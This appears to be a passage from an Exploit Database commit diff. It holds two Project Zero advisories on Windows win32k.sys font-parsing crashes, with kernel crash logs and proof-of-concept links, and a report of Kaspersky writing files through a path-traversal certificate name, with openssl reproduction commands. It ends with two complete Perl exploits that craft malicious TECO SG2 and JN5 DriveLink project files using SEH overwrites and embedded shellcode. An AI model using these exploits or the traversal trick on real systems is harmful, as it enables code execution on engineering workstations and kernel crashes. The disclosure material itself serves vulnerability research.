fffff880`07531530 fffff800`028cb6ee : 00000000`00000001 fffff900`c49ab000 fffff900`c4211000 fffff900`c49ab002 : nt! ?? ::FNODOBFM::`string'+0x4174f
fffff880`07531690 fffff960`00324c14 : 00000000`0000001f fffff960`000b8f1f fffff900`c4ed2f08 00000000`0000001f : nt!KiPageFault+0x16e
fffff880`07531820 fffff960`000b8f1f : fffff900`c4ed2f08 00000000`0000001f 00000000`00000002 00000000`00000007 : win32k!or_all_N_wide_rotated_need_last+0x70
fffff880`07531830 fffff960`000eba0d : 00000000`00000000 fffff880`07532780 00000000`00000000 00000000`0000000a : win32k!draw_nf_ntb_o_to_temp_start+0x10f
fffff880`07531890 fffff960`000c5ab8 : 00000000`00000000 fffff900`c49aad60 fffff900`c4ed2ed0 00000000`00ffffff : win32k!vExpandAndCopyText+0x1c5
fffff880`07531c30 fffff960`00874b4b : fffff900`0000000a fffff880`00000002 fffff900`c4484ca0 fffff880`07532368 : win32k!EngTextOut+0xe54
fffff880`07531fc0 fffff900`0000000a : fffff880`00000002 fffff900`c4484ca0 fffff880`07532368 00000000`00000000 : VBoxDisp+0x4b4b
fffff880`07531fc8 fffff880`00000002 : fffff900`c4484ca0 fffff880`07532368 00000000`00000000 fffff880`07532110 : 0xfffff900`0000000a
fffff880`07531fd0 fffff900`c4484ca0 : fffff880`07532368 00000000`00000000 fffff880`07532110 fffff900`c49b6d58 : 0xfffff880`00000002
fffff880`07531fd8 fffff880`07532368 : 00000000`00000000 fffff880`07532110 fffff900`c49b6d58 fffff900`c49b6de8 : 0xfffff900`c4484ca0
fffff880`07531fe0 00000000`00000000 : fffff880`07532110 fffff900`c49b6d58 fffff900`c49b6de8 fffff900`c49b6c30 : 0xfffff880`07532368
---
While the above is only one example, we have seen the issue manifest itself in a variety of ways: either by crashing while trying to write beyond a pool allocation in the win32k!or_all_4_wide_rotated_need_last, win32k!or_all_N_wide_rotated_need_last, win32k!or_all_N_wide_rotated_no_last or win32k!or_all_N_wide_unrotated functions, or in other locations in the kernel due to system instability caused by pool corruption. In all cases, the crash occurs somewhere below a win32k!EngTextOut function call, i.e. it is triggered while trying to display the glyphs of a malformed TTF on the screen, rather than while loading the font in the system.
We believe the condition to be a pool-based buffer overflow triggered by one of the above win32k.sys functions, with a binary -or- operation being performed on bytes outside a pool allocation. This is also confirmed by the fact that various system bugchecks we have observed are a consequence of the kernel trying to dereference addresses with too many bits set, e.g.:
---
rax=fffff91fc29b4c60 rbx=0000000000000000 rcx=fffff900c4ede320
rdx=0000000000000000 rsi=0000000000000000 rdi=0000000000000000
rip=fffff96000271f6a rsp=fffff880035b8bd0 rbp=fffff880035b9780
r8=000000000000021d r9=fffff900c4edf000 r10=fffff880056253f4
r11=fffff900c4902eb0 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0 nv up ei ng nz na po nc
win32k!PopThreadGuardedObject+0x16:
fffff960`00271f6a 4c8918 mov qword ptr [rax],r11 ds:0030:fffff91f`c29b4c60=????????????????
---
While we have not determined the specific root cause of the vulnerability, the proof-of-concept TTF files triggering the bug were created by taking legitimate fonts and replacing the glyph TrueType programs with ones generated by a dedicated generator. Therefore, the problem is almost certainly caused by some part of the arbitrary TrueType programs.
The issue reproduces on Windows 7 and 8.1. It is easiest to reproduce with Special Pools enabled for win32k.sys (typically leading to an immediate crash in one of the aforementioned functions when the overflow takes place), but it is also possible to observe a system crash on a default Windows installation as a consequence of pool corruption and resulting system instability. In order to reproduce the problem with the provided samples, it is necessary to use a custom program which displays all of the font's glyphs at various point sizes.
Attached is an archive with several proof-of-concept TTF files, together with corresponding kernel crash logs from Windows 7 64-bit.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38713.zip

84
platforms/windows/dos/38714.txt Executable file
View file

@ -0,0 +1,84 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=506
We have encountered a number of Windows kernel crashes in the win32k.sys driver while processing a specific corrupted TTF font file. The cleanest stack trace we have acquired, which might also indicate where the pool corruption takes place and/or the root cause of the vulnerability, is shown below:
---
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: fffff900c4c31000, memory referenced.
Arg2: 0000000000000001, value 0 = read operation, 1 = write operation.
Arg3: fffff96000156a34, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 0000000000000000, (reserved)
[...]
FAULTING_IP:
win32k!memmove+64
fffff960`00156a34 488901 mov qword ptr [rcx],rax
MM_INTERNAL_CODE: 0
DEFAULT_BUCKET_ID: VISTA_DRIVER_FAULT
BUGCHECK_STR: 0x50
CURRENT_IRQL: 0
TRAP_FRAME: fffff880074a0210 -- (.trap 0xfffff880074a0210)
.trap 0xfffff880074a0210
NOTE: The trap frame does not contain all registers.
Some register values may be zeroed or incorrect.
rax=fffff47cffffe440 rbx=0000000000000000 rcx=fffff900c4c31000
rdx=000000000141f518 rsi=0000000000000000 rdi=0000000000000000
rip=fffff96000156a34 rsp=fffff880074a03a8 rbp=0000000000000010
r8=0000000000000018 r9=0000000000000001 r10=fffff900c4c211a8
r11=fffff900c4c30ff0 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0 nv up ei pl nz na pe nc
win32k!memmove+0x64:
fffff960`00156a34 488901 mov qword ptr [rcx],rax ds:a020:fffff900`c4c31000=????????????????
.trap
Resetting default scope
LAST_CONTROL_TRANSFER: from fffff800028fa017 to fffff8000287d5c0
STACK_TEXT:
fffff880`074a00a8 fffff800`028fa017 : 00000000`00000050 fffff900`c4c31000 00000000`00000001 fffff880`074a0210 : nt!KeBugCheckEx
fffff880`074a00b0 fffff800`0287b6ee : 00000000`00000001 fffff900`c4c31000 fffff880`074a0400 fffff900`c4c30fd8 : nt! ?? ::FNODOBFM::`string'+0x4174f
fffff880`074a0210 fffff960`00156a34 : fffff960`00252e40 fffff900`c4c30f98 00000000`00000003 fffff900`c48f2eb0 : nt!KiPageFault+0x16e
fffff880`074a03a8 fffff960`00252e40 : fffff900`c4c30f98 00000000`00000003 fffff900`c48f2eb0 fffff960`002525dc : win32k!memmove+0x64
fffff880`074a03b0 fffff960`0031d38e : 00000000`000028a6 fffff900`c4c30fd8 00000000`00000000 fffff900`c4c21008 : win32k!EPATHOBJ::bClone+0x138
fffff880`074a0400 fffff960`000f07bb : fffff880`00002640 fffff900`c576aca0 00000000`00002640 fffff880`00000641 : win32k!RFONTOBJ::bInsertMetricsPlusPath+0x17e
fffff880`074a0540 fffff960`000eccf7 : fffff880`074a2640 fffff880`074a0a68 fffff880`074a0b40 fffff800`00000641 : win32k!xInsertMetricsPlusRFONTOBJ+0xe3
fffff880`074a0610 fffff960`000ec998 : fffff880`074a0b40 fffff880`074a0a68 fffff900`c0480014 00000000`00000179 : win32k!RFONTOBJ::bGetGlyphMetricsPlus+0x1f7
fffff880`074a0690 fffff960`000ec390 : fffff980`00000000 fffff880`074a0830 fffff900`c04a8000 fffff800`00000008 : win32k!ESTROBJ::vCharPos_H3+0x168
fffff880`074a0710 fffff960`000ed841 : 00000000`41800000 00000000`00000000 00000000`0000000a fffff880`074a0830 : win32k!ESTROBJ::vInit+0x350
fffff880`074a07a0 fffff960`000ed4ef : fffff880`074a0ca0 fffff900`c576aca0 ffffd08c`00000020 ffffffff`ffffffff : win32k!GreGetTextExtentExW+0x275
fffff880`074a0a60 fffff800`0287c853 : 00000000`00000000 fffff880`074a0ca0 00000000`00000001 fffff880`00000000 : win32k!NtGdiGetTextExtentExW+0x237
fffff880`074a0bb0 00000000`750a213a : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemServiceCopyEnd+0x13
00000000`0025e1c8 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : 0x750a213a
---
We have also observed a number of other system bugchecks caused by the particular TTF file with various stack traces indicating a pool corruption condition. For example, on Windows 7 32-bit a crash occurs only while deleting the font, under the following call stack:
---
9823bc7c 90d8dec1 fb634cf0 fb60ecf0 00000001 win32k!RFONTOBJ::vDeleteCache+0x56
9823bca8 90d14209 00000000 00000000 00000001 win32k!RFONTOBJ::vDeleteRFONT+0x190
9823bcd0 90d15e00 9823bcf4 fb62ccf0 00000000 win32k!PUBLIC_PFTOBJ::bLoadFonts+0x6fb
9823bd00 90ddf48e 00000008 fbc16ff8 912f8fc8 win32k!PFTOBJ::bUnloadWorkhorse+0x114
9823bd28 8267ea06 13000117 0040fa24 775e71b4 win32k!GreRemoveFontMemResourceEx+0x60
9823bd28 775e71b4 13000117 0040fa24 775e71b4 nt!KiSystemServicePostCall
---
While we have not determined the specific root cause of the vulnerability, we have pinpointed the offending mutations to reside in the "OS/2" table.
The issue reproduces on Windows 7 (32 and 64-bit). It is easiest to reproduce with Special Pools enabled for win32k.sys (leading to an immediate crash when the bug is triggered), but it it also possible to observe a system crash on a default Windows installation as a consequence of pool corruption and resulting system instability. In order to reproduce the problem with the provided sample, it might be necessary to use a custom program which displays all of the font's glyphs at various point sizes.
Attached is an archive with the proof-of-concept mutated TTF file, together with the original font used to generate it and a corresponding kernel crash log from Windows 7 64-bit.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38714.zip

37
platforms/windows/dos/38734.txt Executable file
View file

@ -0,0 +1,37 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=539
When Kaspersky https inspection is enabled, temporary certificates are created in %PROGRAMDATA% for validation. I observed that the naming pattern is {CN}.cer.
I created a certificate with CN="../../../../Users/All Users/Start Menu/Startup/foo.bat\x00", browsed to an SSL server presenting that certificate and Kaspersky created that certificate name. Jumping from this to code execution seems quite straightforward. I didn't try it, but it seems quite easy to make some ASN.1/X.509 that is also a valid batch file or some other relaxed-parsing format.
Here is how to generate a certificate to reproduce:
$ openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 360
Generating a 2048 bit RSA private key
......................................................................+++
...............+++
writing new private key to 'key.pem'
Enter PEM pass phrase:
Verifying - Enter PEM pass phrase:
-----
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:
State or Province Name (full name) [Some-State]:
Locality Name (eg, city) []:
Organization Name (eg, company) [Internet Widgits Pty Ltd]:
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:../../../../../Users/All Users/Desktop/hello
Email Address []:
Then test start a server like this:
$ openssl s_server -key key.pem -cert cert.pem -accept 8080
And then navigate to https://host:8080 from the Windows host, and observe a certificate called hello.cer on the desktop. I attached a screenshot to demonstrate. I can't believe this actually worked, note that it's not necessary to click or interact with anything to produce the file.

View file

@ -0,0 +1,78 @@
#!/usr/bin/perl
#
#
# TECO SG2 LAD Client 3.51 SEH Overwrite Buffer Overflow Exploit
#
#
# Vendor: TECO Electric and Machinery Co., Ltd.
# Product web page: http://www.teco-group.eu
# Download: http://globalsa.teco.com.tw/support_download.aspx?KindID=9
# Affected version: 3.51 and 3.40
#
# Summary: SG2 Client is a program that enables to create and edit applications.
# The program is providing two edit modes, LADDER and FBD to rapidly and directly
# input the required app. The Simulation Mode allows users to virtually run and test
# the program before it is loaded to the controller.
#
# Desc: The vulnerability is caused due to a boundary error in the processing of a
# Genie LAD file, which can be exploited to cause a buffer overflow when a user opens
# e.g. a specially crafted .GEN file. Successful exploitation could allow execution
# of arbitrary code on the affected machine.
#
# ---------------------------------------------------------------------------------
# (10bc.1358): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000000 ebx=00000000 ecx=43434343 edx=7794b4ad esi=00000000 edi=00000000
# eip=43434343 esp=0018dc24 ebp=0018dc44 iopl=0 nv up ei pl zr na pe nc
# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210246
# 43434343 ?? ???
# 0:000> !exchain
# 0018dc38: ntdll!LdrRemoveLoadAsDataTable+d64 (7794b4ad)
# 0018e1d4: ntdll!LdrRemoveLoadAsDataTable+d64 (7794b4ad)
# 0018e800: MFC42!Ordinal1580+373 (708df2fc)
# 0018f098: 43434343
# Invalid exception stack at 42424242
# ---------------------------------------------------------------------------------
#
# Tested on: Microsoft Windows 7 Professional SP1 (EN) 64bit
# Microsoft Windows 7 Ultimate SP1 (EN) 64bit
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2015-5275
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5275.php
#
#
# 09.10.2015]
#
# 113 bytes MessageBox shellcode
my $sc = "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42".
"\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03".
"\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b".
"\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e".
"\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c".
"\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x65\x64".
"\x21\x01\x68\x20\x50\x77\x6e\x68\x20\x5a\x53\x4c\x89\xe1\xfe".
"\x49\x0b\x31\xc0\x51\x50\xff\xd7";
# Address = 0041D659
# Message = 0x0041d659 : pop edi # pop esi # ret 0x04
# startnull {PAGE_EXECUTE_READ} [LAD.exe]
# ASLR: False;
# Rebase: False;
# SafeSEH: False;
# OS: False;
# v0.2.9.0 (C:\Program Files (x86)\TECO\SG2 Client\LAD.exe)
my $file = "lad.gen";
my $junk = "\x41" x 21750 . "\xEB\x08\x90\x90" . "\x59\xd6\x41\x00" . "\x90" x 28 . $sc . "\x90" x 20;
open($FILE,">$file");
print $FILE "$junk";
close($FILE);
print "Malicious GEN file created successfully!\n";

View file

@ -0,0 +1,77 @@
#!/usr/bin/perl
#
#
# TECO JN5 L510-DriveLink 1.482 SEH Overwrite Buffer Overflow Exploit
#
#
# Vendor: TECO Electric and Machinery Co., Ltd.
# Product web page: http://www.teco-group.eu
# Download: http://globalsa.teco.com.tw/support_download.aspx?KindID=9
# Affected version: 1.482 and 1.462
#
# Summary: JN5 DriveLink is a free program that enables you to
# configure the AC Motor Drive, 510 Series PC-Link. It provides
# support for sleep and fire modes favourable for pumps, fans,
# compressors, and HVAC and communication network protocol of
# Modbus/ BACnet/ Metasys N2.
#
# Desc: The vulnerability is caused due to a boundary error in the
# processing of a project file, which can be exploited to cause a
# buffer overflow when a user opens e.g. a specially crafted .LF5 file.
# Successful exploitation could allow execution of arbitrary code on
# the affected machine.
#
# ---------------------------------------------------------------------------------
# (14c0.12ec): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\system32\MFC42.DLL -
# *** WARNING: Unable to verify checksum for C:\Program Files (x86)\TECO\JN5 DriveLink\L510-DriveLink\L510-DriveLink.exe
# *** ERROR: Module load completed but symbols could not be loaded for C:\Program Files (x86)\TECO\JN5 DriveLink\L510-DriveLink\L510-DriveLink.exe
# eax=000026a0 ebx=0018f430 ecx=41414141 edx=00000001 esi=0018f408 edi=ffffd961
# eip=70735d7e esp=0018f350 ebp=0018f364 iopl=0 nv up ei ng nz na po nc
# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210282
# MFC42!Ordinal2740+0xaa:
# 70735d7e 8b01 mov eax,dword ptr [ecx] ds:002b:41414141=????????
# 0:000> !exchain
# 0018f3e4: 41414141
# Invalid exception stack at 41414141
# ---------------------------------------------------------------------------------
#
# Tested on: Microsoft Windows 7 Professional SP1 (EN) 64bit
# Microsoft Windows 7 Ultimate SP1 (EN) 64bit
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2015-5279
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5279.php
#
#
# 09.10.2015]
#
my $header = "\x04\x00\x00\x00\x0A\x00\x00\x00\x4C\x35\x31\x30\x2D\x31".
"\x50\x32\x2D\x48\x0E\x00\x00\x00\x14\x00\x00\x00\x01\x00";
# 113 bytes MessageBox shellcode
my $sc = "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42".
"\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03".
"\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b".
"\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e".
"\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c".
"\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x65\x64".
"\x21\x01\x68\x20\x50\x77\x6e\x68\x20\x5a\x53\x4c\x89\xe1\xfe".
"\x49\x0b\x31\xc0\x51\x50\xff\xd7";
my $buffer = "A" x 43 . "\xEB\x06\x90\x90" . "\xB0\x5D\x40\x00" . "\x90" x 16 . $sc . "\x90" x 20 . "D" x 2627;
my $file = "Gaming Nerdz.lf5";
my $junk = $header.$buffer;
open($FILE,">$file");
print $FILE "$junk";
close($FILE);
print "Malicious LF5 file created successfully!\n";